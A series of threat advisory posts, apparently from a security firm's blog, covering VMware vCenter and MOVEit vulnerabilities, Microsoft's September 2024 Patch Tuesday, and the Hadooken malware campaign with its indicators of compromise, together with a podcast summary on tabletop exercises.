by jdpoteet | Sep 23, 2024 | Threat Advisories
DOWNLOAD PDF
Summary
Broadcom released a critical security update for VMware vCenter Server to address a high-severity vulnerability that could allow remote code execution (RECE). In addition to this CVE-2024-38812, another vulnerability that allows privilege escalation (CVE-2024-38813) has been patched. vCenter Server installations must be updated to the latest versions immediately.
Risk Score
CVE-ID CVSSv3 Score
CVE-2024-38812 9.8
CVE-2024-38813 7.3
Vulnerability Details
Broadcom issued a security patch for VMware vCenter Server to mitigate the critical vulnerability CVE-2024-38812. This heap-overflow vulnerability in the DCE/RPC protocol potentially allows a malicious actor to exploit this flaw in low-complexity attacks that don’t require user interaction by sending specially crafted network packets, leading to remote code execution.
Broadcom also provided a patch for a privilege escalation vulnerability (CVE-2024-38813) with a CVSS score of 7.5, which could allow an attacker to escalate privileges to root. This flaw, along with CVE-2024-38812, was discovered by security researchers from Team TZL during the Matrix Cup cybersecurity competition in June 2024.
Affected Products
- vCenter Server versions 7.0 and 8.0
- VMware Cloud Foundation versions 4.x and 5.x
Solution
- vCenter Server 8.0: Fixed in version 8.0 U3b
- vCenter Server 7.0: Fixed in version 7.0 U3s
- VMware Cloud Foundation 5.x: Fixed in 8.0 U3b as an asynchronous patch
- VMware Cloud Foundation 4.x: Fixed in 7.0 U3s as an asynchronous patch
Recommendations
- Update vCenter Server and VMware Cloud Foundation to the latest versions as specified above.
- Regularly monitor systems for potential exploits and ensure that only trusted network connections are allowed to access vCenter services.
- Strictly control network perimeter access to vSphere management components and interfaces, including storage and network components
References
by jdpoteet | Sep 19, 2024 | Threat Advisories
DOWNLOAD PDF
SUMMARY
Microsoft’s September 2024 Patch Tuesday release addresses 79 security vulnerabilities, including three actively exploited zero-day vulnerabilities and one publicly disclosed zero-day. The update also resolves 7 critical issues, involving either remote code execution (RCE) or privilege escalation.
The full report is here:
https://www.bleepingcomputer.com/microsoft-patch-tuesday-reports/Microsoft-Patch-Tuesday-September-2024.html
The number of bugs in each vulnerability category is listed below:
- 30 Elevation of Privilege Vulnerabilities
- 4 Security Feature Bypass Vulnerabilities
- 23 Remote Code Execution Vulnerabilities
- 11 Information Disclosure Vulnerabilities
- 8 Denial of Service Vulnerabilities
- 3 Spoofing Vulnerabilities
Zero-day Vulnerabilities fixed:
- Microsoft classifies a zero-day vulnerability as one that is either publicly disclosed or actively exploited while no official fix is available.
RISK SCORING
CVE-ID CVSSv3 Score
CVE-2024-38014 7.8
CVE-2024-38217 5.4
CVE-2024-38226 7.3
CVE-2024-43491 9.8
VULNERABILITY DETAILS
The three actively exploited zero-day vulnerabilities patched in last Tuesday’s updates are:
- CVE-2024-38014 – Windows Installer Elevation of Privilege Vulnerability: This flaw allows attackers to gain SYSTEM privileges on Windows systems. Microsoft hasn’t provided details on how it was used in attacks.
- CVE-2024-38217 – Windows Mark of the Web (MOTW) Security Bypass Vulnerability: Publicly disclosed by Joe Desimone of Elastic Security, this flaw has likely been exploited since 2018. Desimone’s report outlines ‘LNK stomping,’ a technique using specially crafted LNK files to bypass Smart App Control and MOTW security warnings, allowing malicious files to be opened without alerts.
- CVE-2024-38226 – Microsoft Publisher Security Feature Bypass Vulnerability: This vulnerability allows attackers to bypass Office macro policies that block untrusted or malicious files. Microsoft has not revealed the source of this discovery or how it was exploited.
PUBLICLY DISCLOSED ZERO-DAY
CVE-2024-43491 – Microsoft Windows Update Remote Code Execution Vulnerability
This flaw in the servicing stack, though labeled as remote code execution, actually rolls back fixes for older vulnerabilities in certain Windows components. Specifically, it affects Windows 10 version 1507 (released in July 2015) and certain supported versions like Windows 10 Enterprise 2015 LTSB and Windows 10 IoT Enterprise 2015 LTSB. Microsoft clarified that while the flaw reintroduces previously exploited vulnerabilities, there is no evidence it was known or exploited externally before being discovered internally by Microsoft. According to Microsoft’s advisory, systems that installed updates, including the March 2024 security update (KB5035858) through August 2024, were vulnerable to previously mitigated flaws being reintroduced in components such as Active Directory Lightweight Directory Services, Internet Explorer 11, and Windows Media Player.
RECOMMENDATIONS
- Apply security patches to all affected systems.
- CVE-2024-43491 is resolved by installing both the September 2024 Servicing Stack Update (KB5043936) and the September 2024 Windows security update (KB5043083) in-sequence.
REFERENCES
by jdpoteet | Sep 16, 2024 | Uncategorized
DOWNLOAD PDF
SUMMARY
A new malware campaign was recently identified that targets Linux environments, focusing on crypto-mining and botnet malware deployment. This operation specifically targets Oracle Weblogic servers to deliver a malware strain called “Hadooken,” as reported by cloud security firm Aqua. “When Hadooken is executed, it installs Tsunami malware and deploys a crypto miner.”
TECHNICAL DETAILS
Oracle WebLogic Server is an enterprise-level Java EE application server, widely used for building, deploying, and managing large-scale distributed applications. It is popular in banking, e-commerce, and critical business systems due to its support for Java, transaction management, and scalability. WebLogic is often targeted in cyberattacks, primarily due to vulnerabilities such as deserialization flaws, improper access controls, and common misconfigurations – examples include weak credentials or exposed admin consoles. These weaknesses can lead to severe risks, including remote code execution (RCE), privilege escalation, and data breaches, especially if systems are not properly patched or secured.
The recent attack campaign leverages these vulnerabilities and configuration weaknesses to gain an initial foothold and execute arbitrary code on vulnerable WebLogic instances. The attack begins by deploying two nearly identical payloads: one written in Python and the other as a shell script. These payloads retrieve the “Hadooken” malware from a remote server, with IP addresses “89.185.85[.]102” or “185.174.136[.]204.”
The shell script version is designed to search directories containing SSH data, including user credentials and host information using this data to launch attacks on other known servers. This enables lateral movement within the compromised environment, spreading Hadooken malware across the network or connected systems.
Hadooken itself consists of two primary components: a cryptocurrency miner and a distributed denial-of-service (DDoS) botnet named “Tsunami” (also known as Kaiten). Tsunami has previously targeted Jenkins and WebLogic services, especially in Kubernetes environments. Once deployed, Hadooken ensures persistence by creating cron jobs that run the crypto miner at regular intervals.
To evade detection, Hadooken employs various defense evasion techniques. It uses Base64-encoded payloads and disguises malicious processes by naming them innocuously as “bash” or “java” to blend with legitimate system activity. Additionally, it deletes artifacts and traces of its execution to avoid detection. The IP address 89.185.85[.]102 is associated with a hosting provider in Germany, Aeza International LTD (AS210644). A report from Uptycs in February 2024 linked this IP to the “8220 Gang”, which exploited vulnerabilities in Apache Log4j and Atlassian Confluence Server and Data Center for cryptocurrency mining. The same infrastructure is now implicated in the Hadooken campaign, reflecting a consistent trend in abusing known enterprise vulnerabilities.
INDICATORS OF COMPROMISE (IOCs)
Hashes:
- cdf3fce392df6fbb3448c5d26c8d053e
- 4a12098c3799ce17d6d59df86ed1a5b6
- b9f096559e923787ebb1288c93ce2902
- 9bea7389b633c331e706995ed4b3999c
- 8eef5aa6fa9859c71b55c1039f02d2e6
- c1897ea9457343bd8e73f98a1d85a38f
- 249871cb1c396241c9fcd0fd8f9ad2ae
- 73d96a4316182cd6417bdab86d4df1f
Attacker IP:
RECOMMENDATIONS
- Ensure that Oracle WebLogic servers are consistently updated with the latest security patches to close known vulnerabilities like deserialization flaws.
- Use strong, unique credentials for all admin and user accounts, and disable unnecessary admin interfaces. Implement multi-factor authentication (MFA) where possible.
- Regularly audit server configurations to identify misconfigurations such as exposed admin consoles and weak credentials. Limit access to sensitive areas like SSH directories.
- Set up intrusion detection systems (IDS) to monitor unusual traffic, especially from known malicious IP addresses, such as those linked to the Hadooken campaign.
- Restrict the privileges of user accounts and processes to minimize the impact of potential malware execution.
- Install and maintain anti-malware tools on all systems to detect and block malicious activities, including crypto miners and botnets like Tsunami.
- Automate the process of identifying and mitigating vulnerabilities using tools such as vulnerability scanners and patch management solutions.
- Segment the network to prevent malware from easily moving laterally between systems. Use firewalls and access control lists (ACLs) to enforce boundaries.
- Maintain comprehensive logging of all system and network activities to detect unusual behaviors, such as unauthorized SSH access or cron job creations.
- Ensure regular backups of critical systems and test recovery plans to minimize data loss in the event of a malware attack or breach.
REFERENCES
by jdpoteet | Sep 12, 2024 | Videos/Podcasts
This episode of The Backup Wrap-up explores the vital role of tabletop exercises in cybersecurity preparedness. Dr. Mike Saylor, CEO of Blackswan Cybersecurity, offers an in-depth look at how to effectively plan and conduct these exercises. We discuss why these simulations are crucial for organizations of any size and how they can significantly enhance incident response capabilities.
Tune in to learn how to choose appropriate scenarios, engage key stakeholders, and foster a constructive learning environment. This podcast also highlights common mistakes to avoid and emphasizes the need for regular practice. Whether you’re just starting with tabletop exercises or aiming to refine your current approach, this episode delivers practical advice to boost your organization’s cyber resilience. Don’t miss out on this chance to elevate your incident response strategy!
by jdpoteet | Sep 12, 2024 | News, Blogs
Critical MOVEit Transfer Flaw (CVE-2024-5806)
Summary
Threat actors are swiftly attempting to exploit a new and critical authentication bypass vulnerability in Progress MOVEit Transfer. MOVEit Transfer is a managed enterprise file transfer (MFT) solution used for secure file transfers between business partners and customers via SFTP, SCP, and HTTP protocols. The newly identified security flaw (CVE-2024-5806) enables attackers to bypass authentication in the SFTP module, which handles file transfers over SSH.
Threat intelligence
Exploits actively observed
Technical Details
CVE-2024-5806 with a CVSS score of 9.1 (Critical) involves an authentication bypass affecting several versions of Progress MOVEit Transfer. Specifically versions 2023.0.0 before 2023.0.11, from 2023.1.0 before 2023.1.6, and from 2024.0.0 before 2024.0.2. According to an advisory released on Tuesday, “an improper authentication vulnerability in the MOVEit Transfer SFTP module can lead to authentication bypass”.
Shortly after disclosure of the bulletin on CVE-2024-5806, Shadowserver Foundation reported observing attempts to exploit the vulnerability, indicating that hackers are already targeting exposed endpoints. Censys network scans revealed that approximately 2,700 MOVEit Transfer instances were accessible on the internet, predominantly located in the US, UK, Germany, Canada, and the Netherlands. The exact proportion of these instances that have not yet applied the necessary security updates or mitigations remains unknown.
Internet-exposed MOVEit Transfer instances
Source: Censys
The exploitation attempts reported by ShadowServer followed the publication of technical details by the offensive security company watchTowr. They provided a comprehensive analysis of the vulnerability, including exploitation methods and indicators of compromise that defenders should monitor in their logs. watchTowr also explained how attackers could manipulate SSH public key paths to force the server to authenticate using attacker-controlled paths, potentially exposing Net-NTLMv2 hashes. Additionally, proof-of-concept exploit code for CVE-2024-5806 is now publicly available from watchTowr and security researcher Sina Kheirkhah. Given the availability of this information, it is crucial for organizations to promptly apply the related security updates and mitigations, as attack attempts are expected to increase.
Progress issued fixes in MOVEit Transfer versions 2023.0.11, 2023.1.6, and 2024.0.2, available on the Progress Community portal. Customers without an active maintenance agreement should contact the Renewals team or their Progress partner representative to resolve the issue. MOVEit Cloud customers are not required to take any action, as patches have already been automatically deployed.
Progress also released a security bulletin regarding a similar authentication bypass issue, CVE-2024-5805, affecting MOVEit Gateway 2024.0.0. MOVEit is extensively used in enterprise environments, making it a prime target for hackers. This is especially concerning given that the Clop ransomware group exploited a zero-day vulnerability last year to breach and extort thousands of organizations using MOVEit Transfer.
Recommendations
- Immediately update MOVEit Transfer to the latest versions (2023.0.11, 2023.1.6, or 2024.0.2) as provided on the Progress Community portal.
- If you do not have a current maintenance agreement, contact the Renewals team or your Progress partner representative to obtain the necessary updates.
- Use the technical details provided by watchTowr to identify indicators of compromise and monitor logs for signs of exploitation attempts.
- Block Remote Desktop Protocol (RDP) access to MOVEit Transfer servers and restrict outbound connections to known and trusted endpoints to mitigate related risks from the third-party component vulnerability.
- Regularly check for updates and advisories from Progress and other security sources to stay informed about any new vulnerabilities or recommended actions.
- MOVEit Cloud Customers – No action is required, as patches are automatically deployed.
References
